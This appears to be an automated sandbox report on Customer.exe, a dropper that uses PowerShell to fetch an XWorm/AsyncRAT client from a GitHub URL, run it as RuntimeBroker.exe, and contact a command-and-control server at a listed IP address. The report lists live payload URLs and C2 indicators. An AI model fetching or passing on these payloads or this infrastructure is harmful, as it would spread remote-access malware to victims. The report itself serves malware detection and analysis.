            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpString decryptor: <Xwormmm>
            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpString decryptor: XWorm V5.3
            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpString decryptor: USB.exe
            Source: Customer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: Customer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B9BE124h6_2_00007FFD9B9BDA0D
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B9BE135h6_2_00007FFD9B9BDA0D
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B9BCFF2h6_2_00007FFD9B9BCE2D
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B9BED67h6_2_00007FFD9B9BC308
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B9BED67h6_2_00007FFD9B9BC308

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 147.124.210.158:7000
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.124.210.158:7000 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49737 -> 147.124.210.158:7000
            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.124.210.158:7000 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.4:50010 -> 147.124.210.158:7000
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:50010 -> 147.124.210.158:7000
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 147.124.210.158:7000
            Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49737 -> 147.124.210.158:7000
            Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 147.124.210.158:7000 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.124.210.158:7000 -> 192.168.2.4:50010
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 147.124.210.158
            Source: global trafficTCP traffic: 192.168.2.4:49737 -> 147.124.210.158:7000
            Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
            Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
            Source: Joe Sandbox ViewASN Name: AC-AS-1US AC-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49736 -> 185.199.111.133:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49735 -> 140.82.121.4:443
            Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.111.133:443 -> 192.168.2.4:49736
            Source: global trafficHTTP traffic detected: GET /rosarioian181/meeekone/raw/refs/heads/pivoc-pages/XClient.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /rosarioian181/meeekone/refs/heads/pivoc-pages/XClient.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /rosarioian181/meeekone/raw/refs/heads/pivoc-pages/XClient.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /rosarioian181/meeekone/refs/heads/pivoc-pages/XClient.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
            Source: Customer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003CEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: Customer.exe, 00000000.00000002.1769141993.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.4116258187.00000000033A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: Customer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: Customer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: Customer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Customer.exeString found in binary or memory: https://github.com/rosarioian181/meeekone/raw/refs/heads/pivoc-pages/XClient.exe
            Source: Customer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/rosarioian181/meeekone/refs/heads/pivoc-pages/XClient.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49736 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to capture screen (.Net source)
            Source: 6.2.RuntimeBroker.exe.1bba0000.1.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Reads the Security eventlog
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
            Reads the System eventlog
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 6.0.RuntimeBroker.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 6.0.RuntimeBroker.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Customer.exeCode function: 0_2_00007FFD9B9809BD0_2_00007FFD9B9809BD
            Source: C:\Users\user\Desktop\Customer.exeCode function: 0_2_00007FFD9B98E7820_2_00007FFD9B98E782
            Source: C:\Users\user\Desktop\Customer.exeCode function: 0_2_00007FFD9B9893FA0_2_00007FFD9B9893FA
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 6_2_00007FFD9B9B6BA26_2_00007FFD9B9B6BA2
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 6_2_00007FFD9B9B5DF66_2_00007FFD9B9B5DF6
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 6_2_00007FFD9B9BB57A6_2_00007FFD9B9BB57A
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 6_2_00007FFD9B9BB77F6_2_00007FFD9B9BB77F
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 6_2_00007FFD9B9BC3086_2_00007FFD9B9BC308
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 6_2_00007FFD9B9B22986_2_00007FFD9B9B2298
            Source: Customer.exe, 00000000.00000002.1769141993.0000000003D54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs Customer.exe
            Source: Customer.exe, 00000000.00000002.1769141993.0000000002F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Customer.exe
            Source: Customer.exe, 00000000.00000002.1776474565.000000001B9D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename1ogmnitn.dll4 vs Customer.exe
            Source: Customer.exe, 00000000.00000002.1769141993.0000000002FC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Customer.exe
            Source: Customer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.0.RuntimeBroker.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 6.0.RuntimeBroker.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: RuntimeBroker.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: RuntimeBroker.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: RuntimeBroker.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 6.2.RuntimeBroker.exe.1bba0000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 6.2.RuntimeBroker.exe.1bba0000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/12@2/3
            Source: C:\Users\user\Desktop\Customer.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Customer.exe.logJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\6xJjofF9BWlw5WGY
            Source: C:\Users\user\Desktop\Customer.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeprird0.zzi.ps1Jump to behavior
            Source: Customer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Customer.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            Source: C:\Users\user\Desktop\Customer.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Customer.exeReversingLabs: Detection: 50%
            Source: Customer.exeString found in binary or memory: }; Get-Help
            Source: C:\Users\user\Desktop\Customer.exeFile read: C:\Users\user\Desktop\Customer.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Customer.exe "C:\Users\user\Desktop\Customer.exe"
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6040.tmp" "c:\Users\user\AppData\Local\Temp\1ogmnitn\CSC1B46EB8E836240E48C8059BFB557429.TMP"
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6040.tmp" "c:\Users\user\AppData\Local\Temp\1ogmnitn\CSC1B46EB8E836240E48C8059BFB557429.TMP"Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: mi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
